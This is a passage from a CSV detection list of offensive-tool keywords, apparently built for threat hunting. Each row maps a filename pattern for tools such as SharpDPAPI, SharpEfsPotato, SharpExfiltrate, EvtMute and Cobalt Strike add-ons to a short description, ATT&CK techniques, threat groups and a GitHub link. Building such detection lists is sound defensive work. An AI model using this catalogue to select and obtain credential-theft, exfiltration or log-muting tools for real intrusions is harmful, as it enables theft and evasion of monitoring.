+"*SharpDomainSpray-master*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
+"*SharpDoor.exe*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z"
+"*SharpDoor-master*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z"
+"*SharpDPAPI backupkey*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPI*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*SharpDPAPI* credentias *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPI* vaults *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPI.csproj*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPI.Domain*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpDPAPI.exe*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPI.ps1*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPI.sln*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPI.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDPAPIMachine*.cs","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*SharpDPAPI-master*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*SharpDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpDXWebcam*","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","68","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z"
+"*sharpedrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*SharpEDRChecker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpEfsPotato by @bugch3ck*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z"
+"*SharpEfsPotato.cs*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z"
+"*SharpEfsPotato.exe*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*SharpEfsPotato.sln*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*SharpEfsPotato-master*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*SharpEfsTriggeEfs.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharPersist*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*SharPersist.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpEventLoader*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" +"*SharpEventPersist*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" +"*SharpEvtMute.cs*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*SharpEvtMute.exe*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*SharpEvtMute.pdb*","offensive_tool_keyword","EvtMute","This is a 
tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*SharpEvtMute.sln*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*SharpExcelibur*","offensive_tool_keyword","cobaltstrike","Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/OG-Sadpanda/SharpExcelibur","1","1","N/A","10","10","85","19","2021-07-20T04:56:55Z","2021-07-16T19:48:45Z"
+"*sharp-exec *","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z"
+"*SharpExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpExfiltrate.csproj*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*SharpExfiltrate.exe*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*SharpExfiltrate.sln*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*SharpExfiltrateLootCache*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data 
Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*SharpExfiltrate-main*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*sharp-fexec *","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z"
+"*SharpFtpC2*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z"
+"*SharpGen.dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*sharpgen.enable_cache*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*sharpgen.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*sharpgen.set_location*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
